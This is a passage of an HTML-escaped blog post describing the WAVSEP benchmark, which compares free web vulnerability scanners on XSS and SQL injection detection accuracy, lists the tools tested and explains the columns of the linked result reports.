Roman&#39;;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;7 different categories of &lt;b&gt;false positive&lt;/b&gt; Reflected XSS vulnerabilities (GET OR POST).&lt;/li&gt;
&lt;li&gt;10 different categories of &lt;b&gt;false positive&lt;/b&gt; SQL Injection vulnerabilities (GET OR POST).&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Each exposure category in WAVSEP contains an &lt;b&gt;index&lt;/b&gt; page with descriptions of different barriers in test cases, structures of a sample detection payloads and examples of such payloads. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;A general description of each test case is also available in the following excel spreadsheet: &lt;a href=&quot;http://code.google.com/p/wavsep/downloads/detail?name=VulnerabilityTestCases.xlsx&amp;amp;can=2&amp;amp;q&quot;&gt;http://code.google.com/p/wavsep/downloads/detail?name=VulnerabilityTestCases.xlsx&amp;amp;can=2&amp;amp;q&lt;/a&gt;=&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Those that wish to verify the results of the benchmark can download the latest source code of project WAVSEP (including the list of test cases and their description) from the project’s web site:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://code.google.com/p/wavsep/&quot;&gt;http://code.google.com/p/wavsep/&lt;/a&gt; &lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066150&quot;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Benchmark Overview&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;As mentioned before, the benchmark focused on testing free &amp;amp; open source tools that are able to &lt;b&gt;detect &lt;/b&gt;(and not necessarily exploit) security vulnerabilities on a wide range of URLs, and thus, each tool tested needed to support the following features:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l6 level1 lfo5; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Either open source or free to use, so that open source projects and vendors generous enough to contribute to the community will benefit from the benchmark first.&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The ability to detect Reflected XSS and/or SQL Injection vulnerabilities.&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The ability to scan multiple URLs at once (using either a crawler/spider feature, URL/Log file parsing feature or a built-in proxy).&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The ability to control and limit the scan to internal or external host (domain/IP).&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoNormal&quot;&gt;As a direct implication, the test &lt;b&gt;did NOT include&lt;/b&gt; the tools listed in &lt;b&gt;&lt;u&gt;Appendix A – A List of Tools Not Included In The Test&lt;/u&gt;&lt;/b&gt;.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The purpose of WAVSEP’s test cases is to provide a scale for understanding which detection barriers each scanning tool can bypass, and which vulnerability variations can be detected by each tool.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The Reflected Cross Site Scripting vulnerable pages are pretty standard &amp;amp; straightforward, and should provide reliable basis for assessing the detection capabilities of different scanners. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;However, it is important to remember that the SQL Injection vulnerable pages used a MySQL database as a data repository, and thus, the SQL Injection detection results &lt;b&gt;&lt;i&gt;only reflect detection results of SQL Injection vulnerabilities in this type of database&lt;/i&gt;&lt;/b&gt;; the results that might vary when the back end data repository will be different (a theory that will be verified in the next benchmark).&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;
&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: #999999; font-size: 18pt; line-height: 115%;&quot;&gt;Description of Comparison Tables&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;The list of tools tested in this benchmark is organized within the following reports:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;List of Tested Scanners (&lt;a href=&quot;http://wavsep.googlecode.com/files/List%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/List%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20v1.0.pdf&lt;/a&gt;)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Source, License and Technical Details of Tested Scanners (&lt;a href=&quot;http://wavsep.googlecode.com/files/Details%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Details%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20v1.0.pdf&lt;/a&gt;)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;For those of you that wish to get straight to the point, the results of the accuracy assessment are organized within the following reports:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Benchmark Results – Reflected XSS Detection Accuracy (&lt;a href=&quot;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20RXSS%20Detection%20Accuracy%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20RXSS%20Detection%20Accuracy%20v1.0.pdf&lt;/a&gt;)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Benchmark Results – SQL Injection Detection Accuracy – Total (&lt;a href=&quot;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20v1.0.pdf&lt;/a&gt;)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Benchmark Drilldown – Blind SQL Injection Detection (&lt;a href=&quot;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20-%20Blind%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20-%20Blind%20v1.0.pdf&lt;/a&gt;)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Benchmark Drilldown – Erroneous SQL Injection Detection&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;(&lt;a href=&quot;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20-%20ErrorBased%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20-%20ErrorBased%20v1.0.pdf&lt;/a&gt;) &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Additional information was gathered during the benchmark, including information related to the different features of various scanners. These details are organized in the following reports, and might prove useful when searching for tools for specific tasks or tests:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Comparison of Active Vulnerability Detection Features (&lt;a href=&quot;http://wavsep.googlecode.com/files/Active%20Vulnerability%20Detection%20Features%20Comparison%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Active%20Vulnerability%20Detection%20Features%20Comparison%20v1.0.pdf&lt;/a&gt;)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Comparison of Complementary Scanning Features - Passive Analysis, CGI Scanning, Brute Force, etc (&lt;a href=&quot;http://wavsep.googlecode.com/files/Complementary%20Scan%20Features%20Comparison%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Complementary%20Scan%20Features%20Comparison%20v1.0.pdf&lt;/a&gt;)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Comparison of Usability, Coverage and Scan Initiation Features (&lt;a href=&quot;http://wavsep.googlecode.com/files/List%20of%20Scanner%20Features%20%281%20of%203%29%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/List%20of%20Scanner%20Features%20%281%20of%203%29%20v1.0.pdf&lt;/a&gt;)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Comparison of Authentication, Scan Control and Connection Support Features (&lt;a href=&quot;http://wavsep.googlecode.com/files/List%20of%20Scanner%20Features%20%282%20of%203%29%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/List%20of%20Scanner%20Features%20%282%20of%203%29%20v1.0.pdf&lt;/a&gt;)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Comparison of Advanced and Uncommon Features (&lt;a href=&quot;http://wavsep.googlecode.com/files/List%20of%20Scanner%20Features%20%283%20of%203%29%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/List%20of%20Scanner%20Features%20%283%20of%203%29%20v1.0.pdf&lt;/a&gt;)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Information regarding the scan logs, list of untested tools and abnormal behaviors of scanners can be found in the article appendix sections:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following appendix report contains a list of scanners that were not included in the test:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;Appendix A – A List of Tools not included in the Test (The end of the article)&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The scan logs (describing the executing process and configuration of each scanner) can be viewed in the following appendix report: Appendix B – WAVSEP Scanning Logs (&lt;a href=&quot;http://wavsep.googlecode.com/files/WavsepScanLogs%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/WavsepScanLogs%20v1.0.pdf&lt;/a&gt;) &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;During the benchmark, certain tools with abnormal behavior were identified; the list of these tools is presented in the following appendix report: &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;Appendix C – Scanners with Abnormal Behavior (The end of the article)&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;span style=&quot;text-decoration: none;&quot;&gt; &lt;/span&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;
&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;List of Tested Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following report (PDF) contains the list of scanners tested in this benchmark, in addition to their version, their author and their status: &lt;a href=&quot;http://wavsep.googlecode.com/files/List%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/List%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20v1.0.pdf&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;For those of you that want a quick glimpse, the following scanners were tested in the benchmark:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Acunetix Web Vulnerability Scanner (Free Edition), aidSQL, Andiparos, arachni, crawlfish, Gamja, Grabber, Grendel Scan, iScan, JSKY Free Edition, LoverBoy, Mini MySqlat0r, Netsparker Community Edition, N-Stalker Free Edition, Oedipus, openAcunetix, Paros Proxy, PowerFuzzer, Priamos, ProxyStrike, Sandcat Free Edition, Scrawler, ScreamingCSS, ScreamingCobra, Secubat, SkipFish, SQID (SQL Injection Digger), SQLiX, sqlmap, UWSS(Uber Web Security Scanner), VulnDetector, W3AF, Wapiti, Watobo, Web Injection Scanner (WIS), WebCruiser Free Edition, WebScarab, WebSecurify, WSTool, Xcobra, XSSer, XSSploit, XSSS, ZAP.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #999999;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066153&quot;&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Source, License and Technical Details of Tested Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following report (PDF) contains a comparison of licenses, development technology and sources (home page) of different scanners: &lt;a href=&quot;http://wavsep.googlecode.com/files/Details%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Details%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20v1.0.pdf&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;mso-outline-level: 1;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #999999;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066154&quot;&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Comparison of Active Vulnerability Detection Features&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following report (PDF) contains a comparison of active vulnerability detection features in the various scanners: &lt;a href=&quot;http://wavsep.googlecode.com/files/Active%20Vulnerability%20Detection%20Features%20Comparison%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Active%20Vulnerability%20Detection%20Features%20Comparison%20v1.0.pdf&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Aside from the &lt;b&gt;Count&lt;/b&gt; column (which represents the total amount of &lt;b&gt;active&lt;/b&gt; vulnerability detection features supported by the tool, not including complementary features such as web server scanning and passive analysis), each column in the report represents an active vulnerability detection feature, which translates to the exposure presented in the following list: &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;SQL&lt;/b&gt; – SQL Injection&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;BSQL&lt;/b&gt; – Blind SQL Injection&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;RXSS&lt;/b&gt; – Reflected Cross Site Scripting&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;PXSS&lt;/b&gt; – Persistent / Stored Cross Site Scripting&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;DXSS&lt;/b&gt; – DOM XSS&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Redirect&lt;/b&gt; – External Redirect / Phishing via Redirection&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Bck&lt;/b&gt; – Backup File Detection&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Auth&lt;/b&gt; – Authentication Bypass&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;CRLF&lt;/b&gt; – CRLF Injection / Response Splitting&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;LDAP&lt;/b&gt; – LDAP Injection&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;XPath&lt;/b&gt; – X-Path Injection&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;MX&lt;/b&gt; – MX Injection&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Session Test&lt;/b&gt; – Session Identifier Complexity Analysis&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;SSI&lt;/b&gt; – Server Side Include&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;RFI-LFI&lt;/b&gt; – Directory Traversal / Remote File Include / Local File Include (Will be separated into different categories in future benchmarks)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Cmd&lt;/b&gt; – Command Injection / OS Command Injection&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Buffer&lt;/b&gt; – Buffer Overflow / Integer Overflow (Will be separated into different categories in future benchmarks)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;CSRF&lt;/b&gt; – Cross Site Request Forgery&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;A-Dos&lt;/b&gt; – Application Denial of Service / RegEx DoS&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;mso-outline-level: 1;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #999999;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066155&quot;&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Comparison of Complementary Scanning Features&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following report (PDF) contains a comparison of complementary vulnerability detection features in the various scanners: &lt;a href=&quot;http://wavsep.googlecode.com/files/Complementary%20Scan%20Features%20Comparison%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Complementary%20Scan%20Features%20Comparison%20v1.0.pdf&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;In order to clarify what each column in the report table means, use the following interpretation:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Web Server Hardening&lt;/b&gt; – plugins that scan for HTTP method support (Trace, WebDAV), directory listing, Robots and cross-domain information disclosure, version specific vulnerabilities, etc.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;CGI Scanning&lt;/b&gt; - Default files, common vulnerable applications, etc.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Passive Analysis&lt;/b&gt; – security tests that don’t require any actual attacks, and are based instead on information gathering and analysis of responses, including certificate &amp;amp; cipher tests, gathering of comments, mime type analysis, autocomplete detection, insecure transmission of credentials, google hacking, etc.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;File Enumeration&lt;/b&gt; – directory and file enumeration features.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;mso-outline-level: 1;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066156&quot;&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Comparison of Usability and Coverage Features&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following report (PDF) contains a comparison of usability, coverage and scan initiation features of different scanners: &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://wavsep.googlecode.com/files/List%20of%20Scanner%20Features%20%281%20of%203%29%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/List%20of%20Scanner%20Features%20%281%20of%203%29%20v1.0.pdf&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Configuration &amp;amp; Usage Scale&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Very Simple - GUI + Wizard&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Simple - GUI with simple options, Command line with scan configuration file or simple options&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Complex - GUI with numerous options, Command line with multiple options&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Very Complex - Manual scanning feature dependencies, multiple configuration requirements&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Stability Scale&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Very Stable - Rarely crashes, Never gets stuck&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Stable - Rarely crashes, Gets stuck only in extreme scenarios&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Unstable - Crashes every once in a while, Freezes on a consistent basis&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Fragile – Freezes or Crashes on a consistent basis, Fails performing the operation in many cases&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;(Unlike the accuracy values presented in the benchmark for W3AF, which are up date, the stability values for W3AF represent the condition of 1.0-RC3, and &lt;b&gt;not&lt;/b&gt; 1.0-RC4; the values will be updated in the next benchmark, after the new version will be thoroughly tested)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Performance Scale&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Very Fast - Fast implementation with limited amount of scanning tasks&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Fast - Fast implementation with plenty of scanning tasks&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Slow - Slow implementation with limited amount of scanning tasks&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Very Slow - Slow implementation with plenty of scanning tasks&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;mso-outline-level: 1;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066157&quot;&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Comparison of Connection and Authentication Features&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following report (PDF) contains a comparison of connection, authentication and scan control features of different scanners:&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066158&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Ref281064590&quot;&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://wavsep.googlecode.com/files/List%20of%20Scanner%20Features%20%282%20of%203%29%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/List%20of%20Scanner%20Features%20%282%20of%203%29%20v1.0.pdf&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Comparison of Advanced Features&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following report (PDF) contains a comparison of advanced and uncommon scanner features:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://wavsep.googlecode.com/files/List%20of%20Scanner%20Features%20%283%20of%203%29%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/List%20of%20Scanner%20Features%20%283%20of%203%29%20v1.0.pdf&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;mso-outline-level: 1;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066159&quot;&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Benchmark Results – Reflected XSS Detection Accuracy&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The results of the Reflected Cross Site Scripting (RXSS) benchmark are presented in the following report (PDF format):&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20RXSS%20Detection%20Accuracy%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20RXSS%20Detection%20Accuracy%20v1.0.pdf&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The results only include vulnerable pages linked from the index-xss.jsp index page (RXSS-GET or RXSS-POST directories, in addition to the RXSS-FalsePositive directory). XSS Vulnerable locations in the SQL injection vulnerable pages were not taken into account, since they don’t necessarily represent a unique scenario (or at least not until the “layered vulnerabilities” scenario will be implemented).&lt;br /&gt;
&lt;br /&gt;
